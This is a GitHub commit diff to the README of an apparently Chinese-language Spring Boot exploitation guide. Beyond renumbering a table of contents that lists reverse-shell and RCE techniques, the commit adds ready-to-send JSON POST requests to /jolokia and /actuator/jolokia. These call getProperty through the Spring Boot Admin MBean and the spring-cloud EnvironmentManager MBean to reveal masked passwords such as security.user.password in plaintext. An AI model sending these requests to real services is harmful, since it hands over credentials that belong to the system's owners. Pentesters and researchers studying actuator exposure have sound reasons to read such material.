Commit e4d67bf

committed

Update README.md

add new method get Property by jolokia

1 parent ce4740e commit e4d67bfCopy full SHA for e4d67bf

File tree

1 file changed

+43

-38

lines changed

README.md

1 file changed

+43

-38

lines changed

`‎README.md`

Lines changed: 43 additions & 38 deletions

Original file line number	Diff line number	Diff line change
`@@ -27,8 +27,7 @@ Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安`
`27`	`27`	`* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6)`
`28`	`28`	`* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95)`
`29`	`29`	`* [步骤一: 找到想要获取的属性名](#%E6%AD%A5%E9%AA%A4%E4%B8%80-%E6%89%BE%E5%88%B0%E6%83%B3%E8%A6%81%E8%8E%B7%E5%8F%96%E7%9A%84%E5%B1%9E%E6%80%A7%E5%90%8D)`
`30`		`- * [步骤二: jolokia 调用 org\.springframework\.cloud\.context\.environment Mbean 获取明文](#%E6%AD%A5%E9%AA%A4%E4%BA%8C-jolokia-%E8%B0%83%E7%94%A8-orgspringframeworkcloudcontextenvironment-mbean-%E8%8E%B7%E5%8F%96%E6%98%8E%E6%96%87)`
`31`		`- * [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86)`
	`30`	`+ * [步骤二: jolokia 调用相关 Mbean 获取明文](#%E6%AD%A5%E9%AA%A4%E4%BA%8C-jolokia-%E8%B0%83%E7%94%A8%E7%9B%B8%E5%85%B3-mbean-%E8%8E%B7%E5%8F%96%E6%98%8E%E6%96%87)`
`32`	`31`	`* [0x04:获取被星号脱敏的密码的明文 (方法二)](#0x04%E8%8E%B7%E5%8F%96%E8%A2%AB%E6%98%9F%E5%8F%B7%E8%84%B1%E6%95%8F%E7%9A%84%E5%AF%86%E7%A0%81%E7%9A%84%E6%98%8E%E6%96%87-%E6%96%B9%E6%B3%95%E4%BA%8C)`
`33`	`32`	`* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-1)`
`34`	`33`	`* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-1)`
`@@ -37,8 +36,6 @@ Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安`
`37`	`36`	`* [步骤三: 设置 eureka\.client\.serviceUrl\.defaultZone 属性](#%E6%AD%A5%E9%AA%A4%E4%B8%89-%E8%AE%BE%E7%BD%AE-eurekaclientserviceurldefaultzone-%E5%B1%9E%E6%80%A7)`
`38`	`37`	`* [步骤四: 刷新配置](#%E6%AD%A5%E9%AA%A4%E5%9B%9B-%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE)`
`39`	`38`	`* [步骤五: 解码属性值](#%E6%AD%A5%E9%AA%A4%E4%BA%94-%E8%A7%A3%E7%A0%81%E5%B1%9E%E6%80%A7%E5%80%BC)`
`40`		`- * [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-1)`
`41`		`- * [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90)`
`42`	`39`	`* [0x05:获取被星号脱敏的密码的明文 (方法三)](#0x05%E8%8E%B7%E5%8F%96%E8%A2%AB%E6%98%9F%E5%8F%B7%E8%84%B1%E6%95%8F%E7%9A%84%E5%AF%86%E7%A0%81%E7%9A%84%E6%98%8E%E6%96%87-%E6%96%B9%E6%B3%95%E4%B8%89)`
`43`	`40`	`* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-2)`
`44`	`41`	`* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-2)`
`@@ -52,17 +49,17 @@ Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安`
`52`	`49`	`* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-3)`
`53`	`50`	`* [步骤一:找到一个正常传参处](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%89%BE%E5%88%B0%E4%B8%80%E4%B8%AA%E6%AD%A3%E5%B8%B8%E4%BC%A0%E5%8F%82%E5%A4%84)`
`54`	`51`	`* [步骤二:执行 SpEL 表达式](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E6%89%A7%E8%A1%8C-spel-%E8%A1%A8%E8%BE%BE%E5%BC%8F)`
`55`		`- * [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-2)`
`56`		`- * [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-1)`
	`52`	`+ * [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86)`
	`53`	`+ * [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90)`
`57`	`54`	`* [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83)`
`58`	`55`	`* [0x02:spring cloud SnakeYAML RCE](#0x02spring-cloud-snakeyaml-rce)`
`59`	`56`	`* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-4)`
`60`	`57`	`* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-4)`
`61`	`58`	`* [步骤一: 托管 yml 和 jar 文件](#%E6%AD%A5%E9%AA%A4%E4%B8%80-%E6%89%98%E7%AE%A1-yml-%E5%92%8C-jar-%E6%96%87%E4%BB%B6)`
`62`	`59`	`* [步骤二: 设置 spring\.cloud\.bootstrap\.location 属性](#%E6%AD%A5%E9%AA%A4%E4%BA%8C-%E8%AE%BE%E7%BD%AE-springcloudbootstraplocation-%E5%B1%9E%E6%80%A7)`
`63`	`60`	`* [步骤三: 刷新配置](#%E6%AD%A5%E9%AA%A4%E4%B8%89-%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE)`
`64`		`- * [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-3)`
`65`		`- * [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-2)`
	`61`	`+ * [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-1)`
	`62`	`+ * [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-1)`
`66`	`63`	`* [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-1)`
`67`	`64`	`* [0x03:eureka xstream deserialization RCE](#0x03eureka-xstream-deserialization-rce)`
`68`	`65`	`* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-5)`
`@@ -71,8 +68,8 @@ Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安`
`71`	`68`	`* [步骤二:监听反弹 shell 的端口](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E7%9B%91%E5%90%AC%E5%8F%8D%E5%BC%B9-shell-%E7%9A%84%E7%AB%AF%E5%8F%A3)`
`72`	`69`	`* [步骤三:设置 eureka\.client\.serviceUrl\.defaultZone 属性](#%E6%AD%A5%E9%AA%A4%E4%B8%89%E8%AE%BE%E7%BD%AE-eurekaclientserviceurldefaultzone-%E5%B1%9E%E6%80%A7)`
`73`	`70`	`* [步骤四:刷新配置](#%E6%AD%A5%E9%AA%A4%E5%9B%9B%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE)`
`74`		`- * [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-4)`
`75`		`- * [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-3)`
	`71`	`+ * [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-2)`
	`72`	`+ * [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-2)`
`76`	`73`	`* [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-2)`
`77`	`74`	`* [0x04:jolokia logback JNDI RCE](#0x04jolokia-logback-jndi-rce)`
`78`	`75`	`* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-6)`
`@@ -83,8 +80,8 @@ Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安`
`83`	`80`	`* [步骤四:架设恶意 ldap 服务](#%E6%AD%A5%E9%AA%A4%E5%9B%9B%E6%9E%B6%E8%AE%BE%E6%81%B6%E6%84%8F-ldap-%E6%9C%8D%E5%8A%A1)`
`84`	`81`	`* [步骤五:监听反弹 shell 的端口](#%E6%AD%A5%E9%AA%A4%E4%BA%94%E7%9B%91%E5%90%AC%E5%8F%8D%E5%BC%B9-shell-%E7%9A%84%E7%AB%AF%E5%8F%A3)`
`85`	`82`	`* [步骤六:从外部 URL 地址加载日志配置文件](#%E6%AD%A5%E9%AA%A4%E5%85%AD%E4%BB%8E%E5%A4%96%E9%83%A8-url-%E5%9C%B0%E5%9D%80%E5%8A%A0%E8%BD%BD%E6%97%A5%E5%BF%97%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6)`
`86`		`- * [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-5)`
`87`		`- * [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-4)`
	`83`	`+ * [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-3)`
	`84`	`+ * [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-3)`
`88`	`85`	`* [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-3)`
`89`	`86`	`* [0x05:jolokia Realm JNDI RCE](#0x05jolokia-realm-jndi-rce)`
`90`	`87`	`* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-7)`
`@@ -94,16 +91,16 @@ Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安`
`94`	`91`	`* [步骤三:架设恶意 rmi 服务](#%E6%AD%A5%E9%AA%A4%E4%B8%89%E6%9E%B6%E8%AE%BE%E6%81%B6%E6%84%8F-rmi-%E6%9C%8D%E5%8A%A1)`
`95`	`92`	`* [步骤四:监听反弹 shell 的端口](#%E6%AD%A5%E9%AA%A4%E5%9B%9B%E7%9B%91%E5%90%AC%E5%8F%8D%E5%BC%B9-shell-%E7%9A%84%E7%AB%AF%E5%8F%A3)`
`96`	`93`	`* [步骤五:发送恶意 payload](#%E6%AD%A5%E9%AA%A4%E4%BA%94%E5%8F%91%E9%80%81%E6%81%B6%E6%84%8F-payload)`
`97`		`- * [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-6)`
`98`		`- * [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-5)`
	`94`	`+ * [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-4)`
	`95`	`+ * [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-4)`
`99`	`96`	`* [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-4)`
`100`	`97`	`* [0x06:h2 database query RCE](#0x06h2-database-query-rce)`
`101`	`98`	`* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-8)`
`102`	`99`	`* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-8)`
`103`	`100`	`* [步骤一:设置 spring\.datasource\.hikari\.connection\-test\-query 属性](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E8%AE%BE%E7%BD%AE-springdatasourcehikariconnection-test-query-%E5%B1%9E%E6%80%A7)`
`104`	`101`	`* [步骤二:重启应用](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E9%87%8D%E5%90%AF%E5%BA%94%E7%94%A8)`
`105`		`- * [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-7)`
`106`		`- * [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-6)`
	`102`	`+ * [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-5)`
	`103`	`+ * [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-5)`
`107`	`104`	`* [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-5)`
`108`	`105`	`* [0x07:mysql jdbc deserialization RCE](#0x07mysql-jdbc-deserialization-rce)`
`109`	`106`	`* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-9)`
`@@ -114,8 +111,8 @@ Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安`
`114`	`111`	`* [步骤四:刷新配置](#%E6%AD%A5%E9%AA%A4%E5%9B%9B%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE-1)`
`115`	`112`	`* [步骤五:触发数据库查询](#%E6%AD%A5%E9%AA%A4%E4%BA%94%E8%A7%A6%E5%8F%91%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9F%A5%E8%AF%A2)`
`116`	`113`	`* [步骤六:恢复正常 jdbc url](#%E6%AD%A5%E9%AA%A4%E5%85%AD%E6%81%A2%E5%A4%8D%E6%AD%A3%E5%B8%B8-jdbc-url)`
`117`		`- * [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-8)`
`118`		`- * [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-7)`
	`114`	`+ * [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-6)`
	`115`	`+ * [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-6)`
`119`	`116`	`* [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-6)`
`120`	`117`
`121`	`118`
`@@ -308,7 +305,6 @@ Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安`
`308`	`305`
`309`	`306`	- 目标网站存在 `/jolokia` 或 `/actuator/jolokia` 接口
`310`	`307`	- 目标使用了 `jolokia-core` 依赖(版本要求暂未知)
`311`		-- 目标使用了 `spring-cloud` 依赖(具体待补充)
`312`	`308`
`313`	`309`
`314`	`310`
@@ -320,19 +316,23 @@ GET 请求目标网站的 `/env` 或 `/actuator/env` 接口,搜索 `******`
`320`	`316`
`321`	`317`
`322`	`318`
`323`		-##### 步骤二: jolokia 调用 `org.springframework.cloud.context.environment` Mbean 获取明文
	`319`	`+##### 步骤二: jolokia 调用相关 Mbean 获取明文`
`324`	`320`
`325`	`321`	将下面示例中的 `security.user.password` 替换为实际要获取的属性名,直接发包;明文值结果包含在 response 数据包中的 `value` 键中。
`326`	`322`
`327`	`323`
`328`	`324`
	`325`	+- 调用 `org.springframework.boot` Mbean(可能更通用)
	`326`	`+`
	`327`	`+> 实际上是调用 org.springframework.boot.admin.SpringApplicationAdminMXBeanRegistrar 类实例的 getProperty 方法`
	`328`	`+`
`329`	`329`	`spring 1.x`
`330`	`330`
`331`	`331`	```
`332`	`332`	`POST /jolokia`
`333`	`333`	`Content-Type: application/json`
`334`	`334`
`335`		`-{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}`
	`335`	`+{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}`
`336`	`336`	```
`337`	`337`
`338`	`338`	`spring 2.x`
`@@ -341,14 +341,33 @@ spring 2.x`
`341`	`341`	`POST /actuator/jolokia`
`342`	`342`	`Content-Type: application/json`
`343`	`343`
`344`		`-{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}`
	`344`	`+{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}`
`345`	`345`	```
`346`	`346`
`347`	`347`
`348`	`348`
`349`		`-#### 漏洞原理:`
	`349`	+- 调用 `org.springframework.cloud.context.environment` Mbean(需要 spring cloud 相关依赖)
	`350`	`+`
	`351`	`+`
	`352`	`+> 实际上是调用 org.springframework.cloud.context.environment.EnvironmentManager 类实例的 getProperty 方法`
	`353`	`+`
	`354`	`+spring 1.x`
	`355`	`+`
	`356`	+```
	`357`	`+POST /jolokia`
	`358`	`+Content-Type: application/json`
	`359`	`+`
	`360`	`+{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}`
	`361`	+```
	`362`	`+`
	`363`	`+spring 2.x`
	`364`	`+`
	`365`	+```
	`366`	`+POST /actuator/jolokia`
	`367`	`+Content-Type: application/json`
`350`	`368`
`351`		-相当于通过 jolokia 调用 `org.springframework.cloud.context.environment.EnvironmentManager` 类实例的 `getProperty` 方法,直接获取属性值的明文。
	`369`	`+{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}`
	`370`	+```
`352`	`371`
`353`	`372`
`354`	`373`
`@@ -444,20 +463,6 @@ Authorization: Basic dmFsdWU6MTIzNDU2`
`444`	`463`
`445`	`464`
`446`	`465`
`447`		`-#### 漏洞原理:`
`448`		`-`
`449`		`-待完善。`
`450`		`-`
`451`		`-`
`452`		`-`
`453`		`-#### 漏洞分析:`
`454`		`-`
`455`		`-待完善。`
`456`		`-`
`457`		`-`
`458`		`-`
`459`		`-`
`460`		`-`
`461`	`466`	`### 0x05:获取被星号脱敏的密码的明文 (方法三)`
`462`	`467`
`463`	`468`	`> 访问 /env 接口时,spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果`

0 commit comments

Comments

(0)

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Commit e4d67bf

File tree

1 file changed

1 file changed

`‎README.md`

0 commit comments